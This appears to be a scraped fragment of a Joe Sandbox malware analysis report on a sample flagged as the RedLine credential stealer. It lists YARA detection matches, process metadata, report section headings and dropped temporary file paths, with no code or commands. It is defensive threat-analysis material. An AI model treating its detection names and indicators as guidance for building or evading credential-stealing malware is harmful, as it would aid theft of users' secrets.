Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:26:58
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lWnSA7IyVc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lWnSA7IyVc.exe.log

C:\Users\user\AppData\Local\Temp\tmp42CB.tmp

C:\Users\user\AppData\Local\Temp\tmp42DB.tmp

C:\Users\user\AppData\Local\Temp\tmp42EC.tmp

C:\Users\user\AppData\Local\Temp\tmp42ED.tmp

C:\Users\user\AppData\Local\Temp\tmp42EE.tmp

C:\Users\user\AppData\Local\Temp\tmp42FE.tmp

C:\Users\user\AppData\Local\Temp\tmp42FF.tmp

C:\Users\user\AppData\Local\Temp\tmp4310.tmp

C:\Users\user\AppData\Local\Temp\tmp4321.tmp

C:\Users\user\AppData\Local\Temp\tmp4322.tmp

C:\Users\user\AppData\Local\Temp\tmp4332.tmp

C:\Users\user\AppData\Local\Temp\tmp4333.tmp

C:\Users\user\AppData\Local\Temp\tmp7CF2.tmp

C:\Users\user\AppData\Local\Temp\tmp7D02.tmp

Windows Analysis Report
lWnSA7IyVc.exe